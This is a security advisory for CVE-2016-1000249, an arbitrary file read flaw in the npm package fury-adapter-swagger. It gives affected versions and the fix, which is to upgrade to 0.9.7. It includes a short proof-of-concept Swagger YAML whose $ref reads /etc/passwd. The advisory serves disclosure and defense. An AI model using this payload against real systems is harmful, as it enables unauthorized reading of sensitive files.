VYPR
High severityGHSA Advisory· Published Sep 1, 2020· Updated Sep 11, 2023

fury-adapter-swagger allows arbitrary file read from system

CVE-2016-1000249

Description

fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.

Proof of

Concept:

---
swagger: '2.0'
info:
  title: Read local files
  version: '1.0'

paths:
  /foo:
    get:
      responses:
        200:
          description: Some description
          examples:
            text/html:
              example:
                $ref: '/etc/passwd'

Recommendation

Upgrade to version 0.9.7 or later.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
fury-adapter-swaggernpm
>= 0.2.0, < 0.9.70.9.7

Affected products

2

Patches

Vulnerability mechanics

References

6

News mentions

0

No linked articles in our index yet.